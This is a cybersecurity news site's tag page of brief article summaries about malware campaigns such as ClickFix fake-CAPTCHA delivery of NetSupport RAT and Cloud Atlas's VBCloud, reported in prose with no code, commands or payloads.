Tag PowerShell

Cryptocurrency Mining and Clipper Malware Distributed Through Cracked Software on SourceForge

Recent investigations have uncovered an alarming trend in which cybercriminals are distributing malicious software masquerading as legitimate cracked applications, specifically targeting users through the popular software hosting platform, SourceForge. Among the most concerning payloads identified are cryptocurrency miners and clipper malware disguised as Microsoft Office add-ons. A report from Kaspersky…

Read MoreCryptocurrency Mining and Clipper Malware Distributed Through Cracked Software on SourceForge

Winter Vivern APT Group Targets Officials in India, Lithuania, Slovakia, and the Vatican

The advanced persistent threat (APT) group known as Winter Vivern has increasingly targeted governmental entities across regions, including India, Lithuania, Slovakia, and the Vatican, with campaigns dating back to 2021. Reports from SentinelOne indicate that among the specific targets are Polish government agencies, the Ukrainian Ministry of Foreign Affairs, and…

Read MoreWinter Vivern APT Group Targets Officials in India, Lithuania, Slovakia, and the Vatican

Cloud Atlas Unleashes VBCloud Malware: Over 80% of Affected Targets in Russia

Dec 27, 2024
Cyber Attack / Data Theft

The cyber threat group known as Cloud Atlas has been detected utilizing a newly identified malware named VBCloud in its attack campaigns throughout 2024. According to Kaspersky researcher Oleg Kupreev, victims are infected through phishing emails containing a malicious document that exploits a vulnerability in the formula editor (CVE-2018-0802) to download and run malware code. Notably, over 80% of the targets are based in Russia, with additional victims reported in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam. Cloud Atlas, also known as Clean Ursa, Inception, Oxygen, and Red October, is an unidentified threat actor group that has been operational since 2014. In December 2022, the group was tied to cyber attacks on Russia, Belarus, and Transnistria, deploying a PowerShell-based backdoor called PowerShower.

Cloud Atlas Unleashes VBCloud Malware: Majority of Targets Located in Russia December 27, 2024 Cyber Attack / Data Theft Recent observations have revealed that the cyber threat group known as Cloud Atlas has deployed an emerging malware variant referred to as VBCloud in a series of targeted attacks throughout 2024.…

Read More

Cloud Atlas Unleashes VBCloud Malware: Over 80% of Affected Targets in Russia

Dec 27, 2024
Cyber Attack / Data Theft

The cyber threat group known as Cloud Atlas has been detected utilizing a newly identified malware named VBCloud in its attack campaigns throughout 2024. According to Kaspersky researcher Oleg Kupreev, victims are infected through phishing emails containing a malicious document that exploits a vulnerability in the formula editor (CVE-2018-0802) to download and run malware code. Notably, over 80% of the targets are based in Russia, with additional victims reported in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Turkey, and Vietnam. Cloud Atlas, also known as Clean Ursa, Inception, Oxygen, and Red October, is an unidentified threat actor group that has been operational since 2014. In December 2022, the group was tied to cyber attacks on Russia, Belarus, and Transnistria, deploying a PowerShell-based backdoor called PowerShower.

Cybercriminals Leverage ClickFix Technique to Distribute NetSupport RAT in Recent Attacks

February 11, 2025
Malware / Cyber Attack

In a disturbing trend since early January 2025, cybercriminals have been utilizing the ClickFix method to distribute a remote access trojan known as NetSupport RAT. This malware, often spread through deceptive websites and fraudulent browser updates, provides attackers with full control of the victim’s device. This access allows them to monitor the screen in real time, manipulate the keyboard and mouse, upload and download files, and execute harmful commands.

Originally developed as a legitimate tool for IT support under the name NetSupport Manager, the software has been weaponized by malicious actors to target organizations and harvest sensitive information, including screenshots, audio, video, and files. According to eSentire, “ClickFix involves injecting a fake CAPTCHA webpage onto compromised sites, tricking users into executing malicious PowerShell commands that download and activate malware payloads.”

Cyber Actors Leverage ClickFix Technique to Distribute NetSupport RAT in Recent Cyber Incidents February 11, 2025 In a troubling development in the cybersecurity landscape, threat actors have been utilizing a technique known as ClickFix to effectively deliver the NetSupport Remote Access Trojan (RAT) since early January 2025. This malware is…

Read More

Cybercriminals Leverage ClickFix Technique to Distribute NetSupport RAT in Recent Attacks

February 11, 2025
Malware / Cyber Attack

In a disturbing trend since early January 2025, cybercriminals have been utilizing the ClickFix method to distribute a remote access trojan known as NetSupport RAT. This malware, often spread through deceptive websites and fraudulent browser updates, provides attackers with full control of the victim’s device. This access allows them to monitor the screen in real time, manipulate the keyboard and mouse, upload and download files, and execute harmful commands.

Originally developed as a legitimate tool for IT support under the name NetSupport Manager, the software has been weaponized by malicious actors to target organizations and harvest sensitive information, including screenshots, audio, video, and files. According to eSentire, “ClickFix involves injecting a fake CAPTCHA webpage onto compromised sites, tricking users into executing malicious PowerShell commands that download and activate malware payloads.”

Hackers Discover Innovative Methods to Conceal Malware within DNS Records

Cybersecurity researchers have uncovered a new tactic employed by hackers to conceal malware within domain name system (DNS) records, a method that poses significant challenges for traditional defense mechanisms. This technique exploits the mapping of domain names to their respective numerical IP addresses, allowing malicious scripts to operate stealthily. Recent…

Read MoreHackers Discover Innovative Methods to Conceal Malware within DNS Records

GitHub Exploited to Distribute Amadey, Lumma, and Redline InfoStealers in Ukraine

A newly uncovered Malware-as-a-Service (MaaS) scheme is leveraging GitHub repositories to disseminate various infostealer families. This discovery was made by cybersecurity analysts at Cisco Talos, who released their findings today. The report details how the threat actors are utilizing the Amadey bot to directly source malware from public GitHub repositories…

Read MoreGitHub Exploited to Distribute Amadey, Lumma, and Redline InfoStealers in Ukraine

iClicker Website Compromised by ClickFix Attack Featuring Fake CAPTCHA

The iClicker website, a widely-used student engagement platform, was recently compromised in a ClickFix attack, deceiving users into installing malware via a fake “I’m not a robot” verification. Insights into the extent of the breach and protective measures are outlined below. iClicker, a crucial digital tool utilized for classroom engagement…

Read MoreiClicker Website Compromised by ClickFix Attack Featuring Fake CAPTCHA